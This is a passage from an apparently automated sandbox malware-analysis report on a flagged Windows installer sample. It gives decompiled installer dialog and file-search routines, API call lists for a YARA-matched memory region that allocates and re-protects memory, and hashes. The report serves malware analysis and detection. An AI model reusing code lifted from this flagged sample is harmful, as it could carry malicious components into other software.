                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                            • API String ID: 2035342205-1953461807
                                                                            • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                            • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                            • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                                            • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00406873(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4302b8;
			}




                                                                            0x0040687e
                                                                            0x00406887
                                                                            0x00000000
                                                                            0x00406894
                                                                            0x0040688a
                                                                            0x00000000

                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(76FA3420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76FA3420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76FA3420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                            • FindClose.KERNEL32(00000000), ref: 0040688A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                            • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                            • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                            • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AB9DB7 Relevance: 1.7, APIs: 1, Instructions: 246memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 02AB906B: LoadLibraryA.KERNELBASE(?,?,?,02AB9EE4,D6B37BD0,-DB19C8CC), ref: 02AB913B
                                                                            • NtAllocateVirtualMemory.NTDLL ref: 02ABA065
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateLibraryLoadMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2616484454-0
                                                                            • Opcode ID: f4ea3af4fdc528bda823b05b2e5818278e1818bef23aa88c83f7b706eaf0f1bd
                                                                            • Instruction ID: 9bf868e7470a9d2b623e76b0b79445d6f65104300c83fbb2a7c93e23bbeab9f6
                                                                            • Opcode Fuzzy Hash: f4ea3af4fdc528bda823b05b2e5818278e1818bef23aa88c83f7b706eaf0f1bd
                                                                            • Instruction Fuzzy Hash: D09105399093919BDB268E3889843CA7FE1FF5A320F084669C9C59F11BD7258589CBC2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ABC48A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • K32EnumDeviceDrivers.KERNEL32(00000001,02ABCCA8), ref: 02ABC5AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeviceDriversEnum
                                                                            • String ID:
                                                                            • API String ID: 22031212-0
                                                                            • Opcode ID: 62c8152af6ff0d964e0fb4a8dcd818b773a5f601e37f241758776b7861d30d47
                                                                            • Instruction ID: 72dd568f957d93b97347bf8a0e78a3276aa3c2a47aa17e9d61b02fb0978649f6
                                                                            • Opcode Fuzzy Hash: 62c8152af6ff0d964e0fb4a8dcd818b773a5f601e37f241758776b7861d30d47
                                                                            • Instruction Fuzzy Hash: 4F11A330644249CFCF2A8E788AD4BEA6777AF99224F10423BC907CB656DB308A41CA10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ABBEBC Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL(-15D5A9F5,?,?,?,?,02ABB073), ref: 02ABBFDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: b7053776efb50aca0b57ed75faf615849aeebe61085ebdbc2bc630fea3ec9100
                                                                            • Instruction ID: c720da59a1aaed621f40cb919e653f1426d7f5399070f9e0e5d8601a08598f97
                                                                            • Opcode Fuzzy Hash: b7053776efb50aca0b57ed75faf615849aeebe61085ebdbc2bc630fea3ec9100
                                                                            • Instruction Fuzzy Hash: F6018075B006889FDB38CE388C986EE77A7AFD5300F85422EE84A57384CB705A45CB15
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AA8BEA Relevance: .1, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206448386492.0000000002A5B000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A5B000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_2a5b000_SecuriteInfo.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 12a2dbae234d98b52adbb173602d0a197a9c9b5091d48e77cbdc2c357a09e0b4
                                                                            • Instruction ID: 24c0e1f0e167a06f8ac5d7eeedc20fece0c29d4fe1240121b91253627492f0ed
                                                                            • Opcode Fuzzy Hash: 12a2dbae234d98b52adbb173602d0a197a9c9b5091d48e77cbdc2c357a09e0b4
                                                                            • Instruction Fuzzy Hash: 4F11487430D306CEDFA814795AB57BE31B75F62780E88416F8E57832C4DF6885448943
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->199 202 403fc9-403fd6 SetWindowPos 197->202 203 403fdc-403fe3 197->203 200 4041c6-4041cb call 4044e5 198->200 201 404188-40418b 198->201 199->198 216 4041d0-4041eb 200->216 206 40418d-404198 call 401389 201->206 207 4041be-4041c0 201->207 202->203 209 403fe5-403fff ShowWindow 203->209 210 404027-40402d 203->210 206->207 232 40419a-4041b9 SendMessageW 206->232 207->200 215 404466 207->215 217 404100-40410e call 404500 209->217 218 404005-404018 GetWindowLongW 209->218 212 404046-404049 210->212 213 40402f-404041 DestroyWindow 210->213 222 40404b-404057 SetWindowLongW 212->222 223 40405c-404062 212->223 220 404443-404449 213->220 221 404468-40446f 215->221 226 4041f4-4041fa 216->226 227 4041ed-4041ef call 40140b 216->227 217->221 218->217 228 40401e-404021 ShowWindow 218->228 220->215 235 40444b-404451 220->235 222->221 223->217 231 404068-404077 GetDlgItem 223->231 229 404200-40420b 226->229 230 404424-40443d DestroyWindow EndDialog 226->230 227->226 228->210 229->230 237 404211-40425e call 40657a call 404499 * 3 GetDlgItem 229->237 230->220 238 404096-404099 231->238 239 404079-404090 SendMessageW IsWindowEnabled 231->239 232->221 235->215 236 404453-40445c ShowWindow 235->236 236->215 266 404260-404265 237->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 237->267 241 40409b-40409c 238->241 242 40409e-4040a1 238->242 239->215 239->238 244 4040cc-4040d1 call 404472 241->244 245 4040a3-4040a9 242->245 246 4040af-4040b4 242->246 244->217 249 4040ea-4040fa SendMessageW 245->249 250 4040ab-4040ad 245->250 246->249 251 4040b6-4040bc 246->251 249->217 250->244 254 4040d3-4040dc call 40140b 251->254 255 4040be-4040c4 call 40140b 251->255 254->217 264 4040de-4040e8 254->264 262 4040ca 255->262 262->244 264->262 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->216 286 404339-40433b 275->286 286->216 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->220 291 40437e-4043ab CreateDialogParamW 288->291 289->215 290 404353-404359 289->290 290->216 292 40435f 290->292 291->220 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->215 293->215 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->220
                                                                            C-Code - Quality: 84%
                                                                            			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136;
							if( *0x433ecc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8); // executed
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136;
									if( *0x433ecc != _t136) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8); // executed
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc;
						return 0 |  *0x433ecc == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						if( *0x42f268 == _t136 &&  *0x433ed8 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x42f268 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404500(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}































                                                                            0x00403fa5
                                                                            0x00403fac
                                                                            0x00404113
                                                                            0x00404117
                                                                            0x0040411b
                                                                            0x0040411d
                                                                            0x00404122
                                                                            0x0040412d
                                                                            0x00404138
                                                                            0x0040413d
                                                                            0x0040413f
                                                                            0x00404141
                                                                            0x00404144
                                                                            0x00404149
                                                                            0x00404157
                                                                            0x00404164
                                                                            0x0040416b
                                                                            0x0040416b
                                                                            0x0040416c
                                                                            0x0040416c
                                                                            0x00404171
                                                                            0x00404177
                                                                            0x0040417e
                                                                            0x00404184
                                                                            0x00404186
                                                                            0x004041c6
                                                                            0x004041cb
                                                                            0x004041d0
                                                                            0x004041d0
                                                                            0x004041d5
                                                                            0x004041de
                                                                            0x004041e0
                                                                            0x004041e5
                                                                            0x004041eb
                                                                            0x004041ef
                                                                            0x004041ef
                                                                            0x004041f4
                                                                            0x004041fa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404205
                                                                            0x0040420b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404214
                                                                            0x0040421c
                                                                            0x00404221
                                                                            0x00404224
                                                                            0x0040422a
                                                                            0x0040422f
                                                                            0x00404232
                                                                            0x00404238
                                                                            0x0040423d
                                                                            0x00404240
                                                                            0x00404246
                                                                            0x0040424e
                                                                            0x00404254
                                                                            0x0040425a
                                                                            0x0040425e
                                                                            0x00404265
                                                                            0x00404265
                                                                            0x00404265
                                                                            0x0040426f
                                                                            0x00404281
                                                                            0x0040428d
                                                                            0x00404292
                                                                            0x0040429c
                                                                            0x004042a2
                                                                            0x004042a4
                                                                            0x004042a9
                                                                            0x004042a6
                                                                            0x004042a6
                                                                            0x004042a6
                                                                            0x004042b9
                                                                            0x004042d1
                                                                            0x004042d3
                                                                            0x004042d9
                                                                            0x004042ee
                                                                            0x004042db
                                                                            0x004042e4
                                                                            0x004042e6
                                                                            0x004042e6
                                                                            0x004042f4
                                                                            0x00404305
                                                                            0x0040431b
                                                                            0x00404322
                                                                            0x00404328
                                                                            0x0040432c
                                                                            0x00404331
                                                                            0x00404333
                                                                            0x00000000
                                                                            0x00404339
                                                                            0x00404339
                                                                            0x0040433b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404341
                                                                            0x00404345
                                                                            0x0040436a
                                                                            0x00404370
                                                                            0x00404376
                                                                            0x00404378
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040439e
                                                                            0x004043a4
                                                                            0x004043a6
                                                                            0x004043ab
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004043b1
                                                                            0x004043b4
                                                                            0x004043b7
                                                                            0x004043ce
                                                                            0x004043da
                                                                            0x004043f3
                                                                            0x004043f9
                                                                            0x004043fd
                                                                            0x00404402
                                                                            0x00404408
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404412
                                                                            0x0040441d
                                                                            0x00000000
                                                                            0x0040441d
                                                                            0x00404347
                                                                            0x0040434d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404353
                                                                            0x00404359
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040435f
                                                                            0x00404333
                                                                            0x0040442a
                                                                            0x00404436
                                                                            0x0040443d
                                                                            0x00000000
                                                                            0x00404188
                                                                            0x00404188
                                                                            0x0040418b
                                                                            0x004041be
                                                                            0x004041be
                                                                            0x004041c0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004041c0
                                                                            0x0040418d
                                                                            0x00404191
                                                                            0x00404196
                                                                            0x00404198
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004041a8
                                                                            0x004041b0
                                                                            0x00000000
                                                                            0x004041b6
                                                                            0x00403fbe
                                                                            0x00403fbe
                                                                            0x00403fc2
                                                                            0x00403fc7
                                                                            0x00403fd6
                                                                            0x00403fd6
                                                                            0x00403fdc
                                                                            0x00403fe3
                                                                            0x00404027
                                                                            0x0040402d
                                                                            0x00404046
                                                                            0x00404049
                                                                            0x0040405c
                                                                            0x00404062
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00404068
                                                                            0x00404073
                                                                            0x00404075
                                                                            0x00404077
                                                                            0x00404096
                                                                            0x00404096
                                                                            0x00404099
                                                                            0x0040409e
                                                                            0x004040a1
                                                                            0x004040b1
                                                                            0x004040b2
                                                                            0x004040b4
                                                                            0x004040ea
                                                                            0x004040fa
                                                                            0x00000000
                                                                            0x004040fa
                                                                            0x004040b6
                                                                            0x004040bc
                                                                            0x004040d5
                                                                            0x004040da
                                                                            0x004040dc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004040de
                                                                            0x004040ca
                                                                            0x004040ca
                                                                            0x004040cc
                                                                            0x004040cc
                                                                            0x00000000
                                                                            0x004040cc
                                                                            0x004040bf
                                                                            0x004040c4
                                                                            0x00000000
                                                                            0x004040c4
                                                                            0x004040a3
                                                                            0x004040a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004040ab
                                                                            0x00000000
                                                                            0x004040ab
                                                                            0x0040409b
                                                                            0x00000000
                                                                            0x0040409b
                                                                            0x00404081
                                                                            0x00404088
                                                                            0x0040408e
                                                                            0x00404090
                                                                            0x00404466
                                                                            0x00000000
                                                                            0x00404466
                                                                            0x00000000
                                                                            0x00404090
                                                                            0x0040404e
                                                                            0x00000000
                                                                            0x00404056
                                                                            0x00404035
                                                                            0x0040403b
                                                                            0x00404443
                                                                            0x00404449
                                                                            0x00404456
                                                                            0x0040445c
                                                                            0x0040445c
                                                                            0x00000000
                                                                            0x00403fe5
                                                                            0x00403fea
                                                                            0x00403ff6
                                                                            0x00403fff
                                                                            0x00404100
                                                                            0x00000000
                                                                            0x0040401e
                                                                            0x00404021
                                                                            0x00000000
                                                                            0x00404021
                                                                            0x00403fff
                                                                            0x00403fe3

                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                            • ShowWindow.USER32(?), ref: 00403FF6
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                            • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                            • DestroyWindow.USER32 ref: 00404035
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                            • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                            • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                            • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                            • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                            • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                            • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                            • EnableWindow.USER32(?,?), ref: 0040429C
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                            • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                            • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                            • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID:
                                                                            • API String ID: 121052019-0
                                                                            • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                            • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                            • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                            • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
